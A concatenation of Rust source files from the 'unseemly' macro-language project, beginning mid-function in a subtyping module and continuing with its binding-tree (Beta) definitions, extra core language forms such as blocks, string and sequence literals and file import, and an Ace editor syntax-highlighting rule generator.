(supers, subs) = unpack_mystery(mystery); // Pick a maximally-constrained constraint on one side; // does it satisfy all the constraints on the other? // TODO: Does this always find a satisfaction if there is one? for super_constraint in &supers { if !supers .iter() .all(|other_super| must_subtype(super_constraint, other_super, parts).is_ok()) { continue; } // all other super constraints are a supertype to this for sub_constriant in &subs { must_subtype(sub_constriant, super_constraint, parts)? } } Ok(()) } // TODO: we should really have some sort of general mechanism... // `expect_ty_node!` isn't quite right; we just want to panic if it fails fn destr_forall(a: &Ast) -> Option<(Vec<Name>, &Ast)> { if let Node(f, parts, _) = a.c() { if f.name != n("forall_type") { return None; } return Some(( parts.get_rep_leaf_or_panic(n("param")).into_iter().map(Ast::to_name).collect(), parts.get_leaf_or_panic(&n("body")), )); } else { return None; } } fn merge_bindings(lhs: Ast, rhs: Ast) -> Ast { // As an optimization, if the types are spelled the same, we know they're equivalent: if lhs == rhs { return lhs; } merge_mysteries(&ensure_mystery(lhs), &ensure_mystery(rhs)) } impl WalkMode for Subtype { fn name() -> &'static str { "Subtype" } type Elt = Ast; type Negated = UnusedPositiveSubtype; type AsPositive = UnusedPositiveSubtype; type AsNegative = Subtype; type Err = TypeError; type D = crate::walk_mode::Negative<Subtype>; type ExtraInfo = (); fn get_walk_rule(_f: &Form) -> WalkRule<Subtype> { cust_rc_box!(|part_types: LazyWalkReses<Subtype>| { match (destr_forall(&part_types.this_ast), destr_forall(part_types.context_elt())) { (None, None) => { panic!("TODO") // TODO: rename to .subtype // Ok(f.type_compare.neg().clone()) } _ => { panic!("TODO") } } }) } fn automatically_extend_env() -> bool { true } fn walk_var(n: Name, cnc: &LazyWalkReses<Subtype>) -> Result<Assoc<Name, Ast>, TypeError> { // TODO: actually constrain unknowns, and ignore non-unknowns match cnc.env.find(&n) { 
// If it's protected, stop: Some(t) if &VariableReference(n) == t.c() => Ok(Assoc::new()), Some(t) => Ok(Assoc::single(n, crate::ty::synth_type(t, cnc.env.clone())?)), // Or canonicalize(t, cnc.env.clone()), ? None => ty_err!(UnboundName(n) at cnc.this_ast), } } // Simply protect the name; don't try to unify it. fn underspecified(nm: Name) -> Ast { ast!((vr nm)) } fn neg__env_merge( lhs: &Assoc<Name, Ast>, rhs: &Assoc<Name, Ast>, ) -> Result<Assoc<Name, Ast>, TypeError> { // combine constraints Ok(lhs.union_with(rhs, merge_bindings)) // TODO: handle types with mysteries embedded in them // Perhaps we can just recur into them at the end? } } impl NegativeWalkMode for Subtype { fn needs_pre_match() -> bool { false } // we hack `get_walk_rule` for a similar purpose } custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct UnusedPositiveSubtype {} } impl WalkMode for UnusedPositiveSubtype { fn name() -> &'static str { "XXXXX" } type Elt = Ast; type Negated = Subtype; type AsPositive = UnusedPositiveSubtype; type AsNegative = Subtype; type Err = TypeError; type D = crate::walk_mode::Positive<UnusedPositiveSubtype>; type ExtraInfo = (); fn get_walk_rule(_: &Form) -> WalkRule<UnusedPositiveSubtype> { icp!() } fn automatically_extend_env() -> bool { icp!() } } pub fn must_subtype(sub: &Ast, sup: &Ast, parts: &LazyWalkReses<Subtype>) -> Result<(), TypeError> { if sub as *const Ast == sup as *const Ast { return Ok(()); } if sub == sup { return Ok(()); } let result_env = walk::<Subtype>(sup, &parts.with_context(sub.clone()))?; let result_parts = parts.with_environment(result_env.clone()); for mystery in result_env.iter_values() { mystery_satisfiable(mystery, &result_parts)? } return Ok(()); } pub fn must_equal(lhs: &Ast, rhs: &Ast, parts: &LazyWalkReses<Subtype>) -> Result<(), TypeError> { must_subtype(lhs, rhs, parts)?; must_subtype(rhs, lhs, parts) }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/beta.rs
src/beta.rs
#![macro_use] use crate::{ alpha::Ren, ast::{Ast, Atom, ExtendEnv, Node, QuoteLess, QuoteMore}, ast_walk::LazyWalkReses, name::*, util::{assoc::Assoc, mbe::EnvMBE}, walk_mode::WalkElt, }; use std::fmt; custom_derive! { /** `Beta`s are always tied to a particular `Form`, and they have names that refer to the parts of that `Form`. They are generally used to talk about environmental operations, and they are most useful for typechecking (the evaluation process ignores them, because it needs to do more complex operations to calculate extended environments). `Beta`s are trees that determine how variables shadow each other, if multiple variables are being handled at once. The leaf nodes, `Basic` and `SameAs`, indicate (a) where the name comes from (b) where to get the type annotation (`Basic`) or an expression producing the type (`SameAs`) for that name. The more exotic leaf nodes, `Underspecified`, `Protected`, and `BoundButNotUsable` do various weird things. I have no idea where the name "β" came from, and whether it has any connection to α-equivalence. There's probably a very elegant way to make `Beta` just another kind of `Ast`. Finding it might require some time in the math mines, though. */ #[derive(PartialEq, Clone, Reifiable)] pub enum Beta { /// Both of these `Name`s refer to named terms in the current `Scope` /// (or `ResEnv`, for `Ast`s). /// The first is the identifier to import, and the second the syntax for its type. Basic(Name, Name), /// Like `Basic`, but here the second part is another expression /// which should be typechecked, and whose type the new name gets. /// (This can be used write to `let` without requiring a type annotation.) SameAs(Name, Box<Ast>), /// Names are introduced here, but bound to `Trivial`. /// Needed to avoid an infinite regress where the syntax for `Scope` does a self-import /// to expose the names it introduces to the (syntax for) betas that need them. 
BoundButNotUsable(Name), /// Name is introduced here (must be a single `Atom`), /// and its meaning is figured out from usage. Underspecified(Name), /// Name is left alone (must be a single `VarRef`, and already bound) Protected(Name), /// Shadow the names from two `Beta`s. Shadow(Box<Beta>, Box<Beta>), /// Shadow the names from a `Beta`, repeated. /// The `Vec` should always be equal to `names_mentioned(...)` of the `Beta`. ShadowAll(Box<Beta>, Vec<Name>), /// No names Nothing } } pub use self::Beta::*; impl fmt::Debug for Beta { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { Nothing => write!(f, "∅"), Shadow(ref lhs, ref rhs) => write!(f, "({:?} ▷ {:?})", lhs, rhs), ShadowAll(ref sub_beta, ref drivers) => { write!( f, "( {:?} ▷ ... by {})", sub_beta, drivers.iter().map(|name| name.print()).collect::<Vec<_>>().join(" ") ) } Basic(ref name, ref ty) => write!(f, "{}:{}", name, ty), SameAs(ref name, ref ty_source) => write!(f, "{}={}", name, ty_source), BoundButNotUsable(ref name) => write!(f, "!{}", name), Underspecified(ref name) => write!(f, "∀{}", name), Protected(ref name) => write!(f, "↫{}", name), } } } impl Beta { // TODO: alpha.rs needs a version of this that o,ots the RHS of `Basic` and `SameAs`. // but macro.rs needs this version. // (maybe it just needs `names_mentioned_and_bound`) pub fn names_mentioned(&self) -> Vec<Name> { match *self { Nothing => vec![], Shadow(ref lhs, ref rhs) => { lhs.names_mentioned().into_iter().chain(rhs.names_mentioned().into_iter()).collect() } ShadowAll(_, ref drivers) => drivers.clone(), Basic(n, v) => vec![n, v], SameAs(n, ref v_source) => { vec![n].into_iter().chain(v_source.free_vrs().into_iter()).collect() } BoundButNotUsable(n) => vec![n], Underspecified(n) => vec![n], Protected(n) => vec![n], } } // `Protected` doens't actually bind, so we shouldn't rename under it! 
pub fn names_mentioned_and_bound(&self) -> Vec<Name> { match *self { Nothing | Protected(_) => vec![], Shadow(ref lhs, ref rhs) => { let mut res = lhs.names_mentioned_and_bound(); let mut r_res = rhs.names_mentioned_and_bound(); res.append(&mut r_res); res } ShadowAll(ref sub, _) => sub.names_mentioned_and_bound(), // drivers is too broad! Basic(n, _) => vec![n], SameAs(n, _) => vec![n], BoundButNotUsable(n) => vec![n], Underspecified(n) => vec![n], } } // alpha::freshen_binders wants this to extract from complex payloads, hence `f` pub fn extract_from_mbe<T: Clone + std::fmt::Debug>( &self, parts: &EnvMBE<T>, f: &dyn Fn(&T) -> &Ren, ) -> Ren { match *self { Nothing => Ren::new(), Shadow(ref lhs, ref rhs) => { lhs.extract_from_mbe(parts, f).set_assoc(&rhs.extract_from_mbe(parts, f)) } ShadowAll(ref sub_beta, ref drivers) => { let mut res = Ren::new(); for parts in parts.march_all(drivers) { // Maybe `march_all` should memoize? res = res.set_assoc(&sub_beta.extract_from_mbe(&parts, f)); } res } Basic(n_s, _) | SameAs(n_s, _) | BoundButNotUsable(n_s) | Underspecified(n_s) | Protected(n_s) => f(parts.get_leaf_or_panic(&n_s)).clone(), } } } /// Find the environment represented by `b`. /// `SameAs` and `Basic` nodes will cause walking in `Mode`, which should be positive. /// TODO: Unfortunately, this means that they don't work well in the subtyping walk, for instance. pub fn env_from_beta<Mode: crate::walk_mode::WalkMode>( b: &Beta, parts: &LazyWalkReses<Mode>, ) -> Result<Assoc<Name, Mode::Elt>, Mode::Err> { // TODO: figure out why we *do* get called (during subtyping, apparently) // if !Mode::D::is_positive() { icp!("e_f_b on {:#?} in {} (negative)", b, Mode::name())} match *b { Nothing => Ok(Assoc::new()), Shadow(ref lhs, ref rhs) => { Ok(env_from_beta::<Mode>(&*lhs, parts)? 
.set_assoc(&env_from_beta::<Mode>(&*rhs, parts)?)) } ShadowAll(ref sub_beta, ref drivers) => { let mut res = Assoc::new(); for parts in parts.march_all(drivers) { res = res.set_assoc(&env_from_beta::<Mode>(&*sub_beta, &parts)?); } Ok(res) } Basic(name_source, rhs_source) => { if let &Atom(name) = parts.parts.get_leaf_or_panic(&name_source).term.c() { // let LazilyWalkedTerm {term: ref rhs_stx, ..} // = **parts.parts.get_leaf_or_panic(rhs_source); let rhs = parts.switch_to_positive().get_res(rhs_source)?; Ok(Assoc::new().set(name, rhs)) } else { panic!( "User error: {:#?} is supposed to supply names, but is not an Atom.", parts.parts.get_leaf_or_panic(&name_source).term ) } } // `res_source` should be positive and `name_source` should be negative. // Gets the names from `name_source`, treating `res_source` as the context. SameAs(name_source, ref res_source) => { use crate::walk_mode::WalkMode; // TODO: isn't this unhygienic in the case of collisions between part names and // names already in the environment? // Probably ought to just use `susbsitute` anyways. let mut env_for_parts = parts.env.clone(); for n in res_source.free_vrs() { env_for_parts = env_for_parts.set(n, parts.switch_to_positive().get_res(n)?); } let rhs_parts = parts.switch_to_positive().with_environment(env_for_parts); let ctxt: Mode::Elt = crate::ast_walk::walk::<<Mode as WalkMode>::AsPositive>(&res_source, &rhs_parts)?; // Do the actual work: let res = parts.switch_to_negative().with_context(ctxt).get_res(name_source)?; // ... and then check that it's the right set of names! // Somewhat awkward (but not unsound!) run-time error in the case that // the declared export does not match the actual result of negative type synthesis. // This is parallel to unbound variable name errors that we also don't protect against. // (This is more like FreshML/Redex than Pure FreshML/Romeo. 
// The latter have heavyweight logic systems that really aren't worth it, // because the errors in question aren't that bad to debug.) // For our purposes, this syntax is "real", so `quote_depth` is 0: let expected_res_keys = names_exported_by(parts.get_term_ref(name_source), 0); let mut count = 0; for (k, _) in res.iter_pairs() { if !expected_res_keys.contains(k) { panic!( "{} was exported (we only wanted {:#?} via {:#?})", k, expected_res_keys, res_source ); // TODO: make this an `Err`. And test it with ill-formed `Form`s } count += 1; } if count != expected_res_keys.len() { // TODO: Likewise: panic!("expected {:?} exports, got {}", expected_res_keys, count) } Ok(res) } BoundButNotUsable(name_source) => { // For our purposes, this syntax is "real", so `quote_depth` is 0: let expected_res_keys = names_exported_by(parts.get_term_ref(name_source), 0); let mut res = Assoc::new(); for name in expected_res_keys { res = res.set(name, <Mode::Elt as WalkElt>::from_ast(&ast!((trivial)))); } Ok(res) } Underspecified(ref name_source) => { if let &Atom(name) = parts.parts.get_leaf_or_panic(&name_source).term.c() { Ok(Assoc::new().set(name, Mode::underspecified(name))) } else { panic!( "{:#?} is supposed to supply names, but is not an Atom.", parts.parts.get_leaf_or_panic(name_source).term ) } } Protected(ref name_source) => { // Since protection isn't binding, it gets variable references instead if let ExtendEnv(boxed_vr, _) = parts.parts.get_leaf_or_panic(&name_source).term.c() { // HACK: rely on the fact that `walk_var` // won't recursively substitute until it "hits bottom" // Drop the variable reference right into the environment. Ok(Assoc::new().set(boxed_vr.vr_to_name(), Mode::Elt::from_ast(&*boxed_vr))) } else { panic!( "{:#?} is supposed to supply names, but is not an EE(VR()).", parts.parts.get_leaf_or_panic(name_source).term ) } } } } // Like `Beta`, but without type information (which gets added at the `import` stage). // At the moment, this seems to work better... 
custom_derive! { #[derive(PartialEq, Eq, Clone, Reifiable)] pub enum ExportBeta { /// Like `Basic`/`SameAs`/`Underspecified`/`Protected`, but without committing to a type Use(Name), Shadow(Box<ExportBeta>, Box<ExportBeta>), /// Shadow the names from a `ExportBeta`, repeated. /// The `Vec` should always be equal to `names_mentioned(...)` of the `ExportBeta`. ShadowAll(Box<ExportBeta>, Vec<Name>), /// No names Nothing } } impl fmt::Debug for ExportBeta { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { ExportBeta::Nothing => write!(f, "∅"), ExportBeta::Shadow(ref lhs, ref rhs) => write!(f, "({:#?} ▷ {:#?})", lhs, rhs), ExportBeta::ShadowAll(ref sub_beta, ref drivers) => { write!(f, "( {:#?} ▷ ... by {:#?})", sub_beta, drivers) } ExportBeta::Use(ref name) => write!(f, "{:#?}", name), } } } impl ExportBeta { pub fn names_mentioned(&self) -> Vec<Name> { match *self { ExportBeta::Nothing => vec![], ExportBeta::Shadow(ref lhs, ref rhs) => { let mut res = lhs.names_mentioned(); let mut r_res = rhs.names_mentioned(); res.append(&mut r_res); res } ExportBeta::ShadowAll(_, ref drivers) => drivers.clone(), ExportBeta::Use(n) => vec![n], } } // This has an overly-specific type to match implementation details of alpha::freshen_binders. // Not sure if we need a generalization, though. pub fn extract_from_mbe<T: Clone + std::fmt::Debug>( &self, parts: &EnvMBE<T>, f: &dyn Fn(&T) -> &Ren, ) -> Ren { match *self { ExportBeta::Nothing => Ren::new(), ExportBeta::Shadow(ref lhs, ref rhs) => { lhs.extract_from_mbe(parts, f).set_assoc(&rhs.extract_from_mbe(parts, f)) } ExportBeta::ShadowAll(ref sub_beta, ref drivers) => { let mut res = Ren::new(); for parts in parts.march_all(drivers) { // Maybe `march_all` should memoize? 
res = res.set_assoc(&sub_beta.extract_from_mbe(&parts, f)); } res } ExportBeta::Use(n_s) => f(parts.get_leaf_or_panic(&n_s)).clone(), } } } // Helper for `bound_from_[export_]beta`: fn names_exported_by(ast: &Ast, quote_depth: i16) -> Vec<Name> { use tap::tap::Tap; match ast.c() { Atom(n) => vec![*n], Node(_, sub_parts, export) => { if quote_depth <= 0 { bound_from_export_beta(export, sub_parts, quote_depth) } else { sub_parts.map_reduce( &|a: &Ast| names_exported_by(a, quote_depth), &|v1, v2| v1.clone().tap_mut(|v1| v1.append(&mut v2.clone())), vec![], ) } } ExtendEnv(body, _) => names_exported_by(body, quote_depth), QuoteMore(body, _) => names_exported_by(body, quote_depth + 1), QuoteLess(body, _) => names_exported_by(body, quote_depth - 1), ast if quote_depth <= 0 => icp!("beta SameAs refers to an invalid AST node: {}", ast), _ => vec![], } } // Like just taking the (non-Protected) keys from `env_from_beta`, but faster and non-failing. // It's a runtime error if the definition of a form causes `env_from_beta` to diverge from this. 
pub fn bound_from_beta(b: &Beta, parts: &EnvMBE<crate::ast::Ast>, quote_depth: i16) -> Vec<Name> { match *b { Nothing => vec![], Shadow(ref lhs, ref rhs) => { let mut res = bound_from_beta(&*lhs, parts, quote_depth); let mut res_r = bound_from_beta(&*rhs, parts, quote_depth); res.append(&mut res_r); res } ShadowAll(ref sub_beta, ref drivers) => { let mut res = vec![]; for sub_parts in &parts.march_all(drivers) { res.append(&mut bound_from_beta(&*sub_beta, sub_parts, quote_depth)); } res } SameAs(ref n_s, _) | BoundButNotUsable(ref n_s) => { // Can be a non-atom names_exported_by(parts.get_leaf_or_panic(n_s), quote_depth) } Protected(ref _n_s) => vec![], // Non-binding Basic(ref n_s, _) | Underspecified(ref n_s) => { vec![parts.get_leaf_or_panic(n_s).to_name()] } } } // Like just taking the keys from `env_from_export_beta`, but faster and non-failing pub fn bound_from_export_beta( b: &ExportBeta, parts: &EnvMBE<crate::ast::Ast>, quote_depth: i16, ) -> Vec<Name> { match *b { ExportBeta::Nothing => vec![], ExportBeta::Shadow(ref lhs, ref rhs) => { let mut res = bound_from_export_beta(&*lhs, parts, quote_depth); let mut res_r = bound_from_export_beta(&*rhs, parts, quote_depth); res.append(&mut res_r); res } ExportBeta::ShadowAll(ref sub_beta, ref drivers) => { let mut res = vec![]; for sub_parts in &parts.march_all(drivers) { res.append(&mut bound_from_export_beta(&*sub_beta, sub_parts, quote_depth)); } res } ExportBeta::Use(ref n_s) => { // Can be a non-atom names_exported_by(parts.get_leaf_or_panic(n_s), quote_depth) } } } // TODO NOW: make this return the atom-freshened node (possibly freshening recursive nodes) // We keep a table, keyed on leaf names and actual atoms, to keep track of the freshening. // This means that shadowing in leaf-named atom set doesn't get separated. // (e.g. `.[a : Int a : Int . ⋯].` freshens to `.[a🍅 : Int a🍅 : Int . ⋯].`). // As long as betas can't select a different shadowing direction, this isn't a problem. 
pub fn freshening_from_beta( b: &Beta, parts: &EnvMBE<crate::ast::Ast>, memo: &mut std::collections::HashMap<(Name, Name), Name>, ) -> Assoc<Name, Ast> { match *b { Nothing => Assoc::new(), Shadow(ref lhs, ref rhs) => freshening_from_beta(&*lhs, parts, memo) .set_assoc(&freshening_from_beta(&*rhs, parts, memo)), ShadowAll(ref sub_beta, ref drivers) => { let mut res = Assoc::new(); for parts in parts.march_all(drivers) { res = res.set_assoc(&freshening_from_beta(&*sub_beta, &parts, memo)); } res } Protected(_n_s) => unimplemented!("Not hard, just not used yet"), // TODO: n_s isn't necessarily just one name in the `SameAs` case! This is an ICP for sure. Basic(n_s, _) | SameAs(n_s, _) | Underspecified(n_s) | BoundButNotUsable(n_s) => { let this_name = parts.get_leaf_or_panic(&n_s).to_name(); Assoc::new().set( this_name, raw_ast!(VariableReference( *memo.entry((n_s, this_name)).or_insert_with(|| this_name.freshen()) )), ) } } } #[test] fn env_from_beta_basics() { let trivial_form = crate::core_type_forms::type_defn("unused", form_pat!((impossible))); let complex_ast = ast!({trivial_form; "a" => "aa", "b" => "bb", "c" => (vr "my_int"), "d" => (vr "S"), "e" => [@"3" "e0", "e1", "e2"], "f" => [@"3" (vr "S"), (vr "T"), (vr "S")], "g" => [@"3" (vr "my_int"), (vr "my_int"), (vr "my_int")], "S" => {"Type" "Nat" :} // same name as a varable in the environment }); let lwr = LazyWalkReses::<crate::ty::SynthTy>::new( assoc_n!("my_int" => uty!({Int :}), "S" => uty!(T), "T" => uty!({Int :})), assoc_n!(), complex_ast.clone(), ); assert_eq!(env_from_beta(&beta!([]), &lwr), Ok(assoc_n!())); assert_eq!(env_from_beta(&beta!(["a" : "d"]), &lwr), Ok(assoc_n!("aa" => uty!({Int :})))); assert_eq!( env_from_beta(&beta!([* ["e" : "f"]]), &lwr), Ok(assoc_n!("e0" => uty!({Int :}), "e1" => uty!({Int :}), "e2" => uty!({Int :}))) ); assert_eq!( env_from_beta(&beta!([*["e" = "g"]]), &lwr), Ok(assoc_n!("e0" => uty!({Int :}), "e1" => uty!({Int :}), "e2" => uty!({Int :}))) ); assert_eq!( 
env_from_beta(&beta!(["a" += {Type fn : [d] d}]), &lwr), Ok(assoc_n!("aa" => uty!({fn : [{Int :}] {Int :}}))) ); // Name collision: why isn't this failing? assert_eq!( env_from_beta(&beta!(["a" += {Type fn : [d] S}]), &lwr), Ok(assoc_n!("aa" => uty!({fn : [{Int :}] {Nat:}}))) ); assert_eq!(env_from_beta(&beta!(["a" : "S"]), &lwr), Ok(assoc_n!("aa" => uty!({Nat :})))); } // fn fold_beta<T>(b: Beta, over: Assoc<Name, T>, // leaf: Fn(&Ast ) -> S // TODO: Test negative quasiquotation (in a non end-to-end way): // '[Expr | (plus one (plus one (plus ,[lhs], ,[rhs], )))]' // #[test] // fn beta_with_negative_quasiquote() { // // }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/core_extra_forms.rs
src/core_extra_forms.rs
use crate::{ ast::{Ast, AstContents::*}, ast_walk::{LazyWalkReses, WalkRule::*}, core_type_forms::get__primitive_type, grammar::FormPat, name::*, runtime::eval::Value, util::mbe::EnvMBE, }; use std::rc::Rc; pub fn extend__capture_language( pc: crate::earley::ParseContext, _starter_info: Ast, ) -> crate::earley::ParseContext { crate::earley::ParseContext { grammar: assoc_n!("OnlyNt" => Rc::new(FormPat::Named(n("body"), Rc::new(FormPat::Anyways(raw_ast!(Node( basic_typed_form!( [], // No syntax cust_rc_box!(|parts| { // Reify the current type environment: let mut struct_body = vec![]; for (k, v) in parts.env.iter_pairs() { struct_body.push(EnvMBE::new_from_leaves(assoc_n!( "component_name" => ast!((at *k)), "component" => v.clone() ))) } // HACK: Anything that was added to the prelude is phaseless. let phaseless_env = parts.prelude_env.cut_common( &crate::runtime::core_values::core_types()); let mut struct_body__phaseless = vec![]; for (k, v) in phaseless_env.iter_pairs() { struct_body__phaseless.push(EnvMBE::new_from_leaves(assoc_n!( "component_name" => ast!((at *k)), "component" => v.clone() ))) } Ok(ast!({"Type" "tuple" : "component" => [ (, get__primitive_type(n("LanguageSyntax"))), (, raw_ast!(Node(crate::core_forms::find("Type", "struct"), EnvMBE::new_from_anon_repeat(struct_body), crate::beta::ExportBeta::Nothing))), (, raw_ast!(Node(crate::core_forms::find("Type", "struct"), EnvMBE::new_from_anon_repeat(struct_body__phaseless), crate::beta::ExportBeta::Nothing)))] }))}), cust_rc_box!(move |parts| { Ok(Value::Sequence(vec![ // The captured language syntax: Rc::new(Value::ParseContext(Box::new(pc.clone()))), // Reifying the value environment is easy: Rc::new(Value::Struct(parts.env)) ]))}) ), EnvMBE::<Ast>::new(), crate::beta::ExportBeta::Nothing ))))))), // We can't just squirrel `reified_language` here: // these only affect earlier phases, and we need the language in phase 0 eval_ctxt: LazyWalkReses::<crate::runtime::eval::Eval>::new_empty(), type_ctxt: 
LazyWalkReses::<crate::ty::SynthTy>::new_empty(), } } // Shift the parser into the language specified in "filename". // TODO: This is probably unhygenic in some sense. Perhaps this needs to be a new kind of `Beta`? fn extend_import( _pc: crate::earley::ParseContext, starter_info: Ast, ) -> crate::earley::ParseContext { let filename = match starter_info.c() { // Skip "import" and the separator: Shape(ref parts) => match parts[2].c() { IncompleteNode(ref parts) => { parts.get_leaf_or_panic(&n("filename")).to_name().orig_sp() } _ => icp!("Unexpected structure {:#?}", parts), }, _ => icp!("Unexpected structure {:#?}", starter_info), }; let crate::Language { pc, type_env, type_env__phaseless, value_env } = crate::language_from_file(&std::path::Path::new(&filename)); crate::earley::ParseContext { grammar: pc.grammar.set( n("ImportStarter"), Rc::new(FormPat::Scope( basic_typed_form!( (named "body", (call "Expr")), cust_rc_box!(move |parts| { // HACK: Copied from `ExtendEnvPhaseless` LazyWalkReses { env: parts.env.set_assoc(&type_env) .set_assoc(&type_env__phaseless), prelude_env: parts.prelude_env.set_assoc(&type_env__phaseless), more_quoted_env: parts.more_quoted_env.iter().map( |e| e.set_assoc(&type_env__phaseless)).collect(), less_quoted_env: parts.less_quoted_env.iter().map( |e| e.set_assoc(&type_env__phaseless)).collect(), .. parts.clone() }.get_res(n("body")) }), cust_rc_box!(move |parts| { parts.with_environment( parts.env.set_assoc(&value_env)).get_res(n("body")) }) ), crate::beta::ExportBeta::Nothing, )), ), ..pc } } /// Some of these forms are theoretically implementable as macros from other forms, /// but for performance and debugability reasons, they are a part of Unseemly. /// Other of these forms are just not central to the design of Unseemly and have ad-hoc designs. /// /// Stored as a `FormPat` instead of a `SynEnv` /// because we need to merge this with the rest of the "Expr"s. 
pub fn make_core_extra_forms() -> FormPat { // I think we want to have "Stmt" separate from "Expr", once #4 is complete. // Should "Item"s be valid "Stmt"s? Let's do whatever Rust does. forms_to_form_pat![ typed_form!("prefab_type", [(lit "prefab_type"), (named "ty", (call "Type"))], /* type */ cust_rc_box!(move |part_types| { Ok(ast!({"Type" "type_apply" : "type_rator" => (, (get__primitive_type(n("Type")))), "arg" => [(, part_types.get_res(n("ty"))?)] })) }), /* evaluation */ // HACK: at evaluation time, nobody cares cust_rc_box!(move |_| { Ok(Value::AbstractSyntax(ast!((trivial)))) }) ), typed_form!("block", (delim "-{", "{", [(star [(named "effect", (call "Expr")), (lit ";")]), (named "result", (call "Expr"))]), /* type */ cust_rc_box!(move |part_types| { let _ = part_types.get_rep_res(n("effect"))?; part_types.get_res(n("result")) }), /* evaluation */ cust_rc_box!( move | part_values | { for effect_values in part_values.march_all(&[n("effect")]) { let _ = effect_values.get_res(n("effect"))?; } part_values.get_res(n("result")) })), typed_form!("capture_language", // Immediately descend into a grammar with one NT pointing to one form, // which has captured the whole parse context. (extend_nt [(lit "capture_language")], "OnlyNt", extend__capture_language), Body(n("body")), Body(n("body"))), typed_form!("import_language_from_file", (extend [(lit "import"), (call "DefaultSeparator"), (named "filename", (scan r"/\[(.*)]/"))], (named "body", (call "ImportStarter")), extend_import), Body(n("body")), Body(n("body"))), typed_form!("string_literal", (named "body", (scan_cat r#"\s*"((?:[^"\\]|\\"|\\\\)*)""#, "string.quoted.double")), cust_rc_box!(|_| { Ok(ast!({"Type" "String" :})) }), cust_rc_box!(|parts| { // Undo the escaping: Ok(Value::Text(parts.get_term(n("body")).to_name().orig_sp() .replace(r#"\""#, r#"""#) .replace(r#"\\"#, r#"\"#))) }) ), // Sequence literals. 
These actually can't be implemented as a macro // until we get recursive macro invocations: // there's no other way to go from a tuple to a sequence. typed_form!("seq_literal", (delim "s[", "[", (star (named "elt", (call "Expr")))), cust_rc_box!(|parts| { let mut elts = parts.get_rep_res(n("elt"))?; match elts.pop() { None => Ok(ast!({"Type" "forall_type" : "param" => ["T"], "body" => (import [* [forall "param"]] { "Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [(vr "T")]})})), Some(ref t) => { for ref other_elt in elts { crate::ty_compare::must_equal(t, other_elt, &parts).map_err( |e| crate::util::err::sp(e, parts.this_ast.clone()) )?; } Ok(ast!({ "Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [(, t.clone())]})) } } }), cust_rc_box!(|parts| { Ok(Value::Sequence( parts.get_rep_res(n("elt"))?.into_iter().map(|elt| Rc::new(elt)).collect())) }) ) ] }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/highlighter_generation.rs
src/highlighter_generation.rs
use crate::{earley::parse, grammar::SynEnv}; pub fn ace_rules(se: &SynEnv) -> String { let mut categories = vec![]; let mut keyword_operators = vec![]; for (_, nt_grammar) in se.iter_pairs() { // Separate "keyword.operator" out; there are so many of them. // TODO: The principled thing to do would be to do this for each name... let (keyword_operator, mut normal) = nt_grammar .textmate_categories() .into_iter() .partition(|(_, cat)| cat == "keyword.operator"); categories.append(&mut normal); keyword_operators.append(&mut keyword_operator.into_iter().map(|(pat, _)| pat).collect()); } keyword_operators.sort(); keyword_operators.dedup(); // Make one big rule for all of them (will perform better, probably): categories.push((keyword_operators.join("|"), "keyword.operator".to_string())); // Order, roughly, by specificity of syntax: categories.sort_by(|a, b| { if a.1 == "keyword" { return std::cmp::Ordering::Less; } if b.1 == "keyword" { return std::cmp::Ordering::Greater; } if a.1.starts_with("string") { return std::cmp::Ordering::Less; } if b.1.starts_with("string") { return std::cmp::Ordering::Greater; } if a.1.starts_with("paren") { return std::cmp::Ordering::Less; } if b.1.starts_with("paren") { return std::cmp::Ordering::Greater; } if a.1.starts_with("keyword.operator") { return std::cmp::Ordering::Less; } if b.1.starts_with("keyword.operator") { return std::cmp::Ordering::Greater; } if a.1.starts_with("variable") { return std::cmp::Ordering::Less; } if b.1.starts_with("variable") { return std::cmp::Ordering::Greater; } std::cmp::Ordering::Equal }); categories.dedup(); let mut res = String::new(); for (pat, name) in categories { if let Ok(re) = regex::Regex::new(&pat) { if re.is_match("") { continue; // TODO: warn about regexes matching empty strings! } } else { continue; // TODO: warn about bad regexes! 
} res.push_str(&format!( "{{ token: '{}', regex: /{}/ }},\n", name, // Remove some regexp concepts not supported by JS: pat.replace(r"\p{Letter}", r"[a-zA-Z\xa1-\uFFFF]") .replace(r"\p{Number}", r"[0-9]") .replace("/", "\\/") // Escape slashes )) } res } pub fn dynamic__ace_rules(prog: &str, lang: &crate::Language) -> String { // This only works with the Unseemly syntax extension form, which sets this side-channel: crate::core_macro_forms::syn_envs__for__highlighting.with(|envs| envs.borrow_mut().clear()); // Errors are okay, especially late! let _ = parse(&crate::core_forms::outermost_form(), lang.pc.clone(), prog); let mut result = String::new(); crate::core_macro_forms::syn_envs__for__highlighting.with(|envs| { use indoc::writedoc; use std::fmt::Write; let mut prev_grammar = lang.pc.grammar.clone(); let mut cur_rule_name = "start".to_string(); let mut idx = 0; for (extender_ast, grammar) in &*envs.borrow() { let longest_line = extender_ast .orig_str(prog) .split('\n') .map(str::trim) .max_by(|a, b| a.len().cmp(&b.len())) .unwrap(); writedoc!( result, " {}: [ {{ token: 'text', regex: /(?={})/, next: 'still_{}' }}, {} ], ", cur_rule_name, regex::escape(longest_line).replace('/', "\\/"), cur_rule_name, ace_rules(&prev_grammar), ) .unwrap(); idx += 1; let next_rule_name = format!("lang_{}", idx); // Stay in the current language until we hit `in`. writedoc!( result, " still_{}: [ {{ token: 'keyword.operator', regex: 'in', next: '{}' }}, {} ], ", cur_rule_name, next_rule_name, ace_rules(&prev_grammar), ) .unwrap(); cur_rule_name = next_rule_name; prev_grammar = grammar.clone(); } writedoc!( result, " {}: [ {} ],", cur_rule_name, ace_rules(&prev_grammar), ) .unwrap(); }); result }
rust
MIT
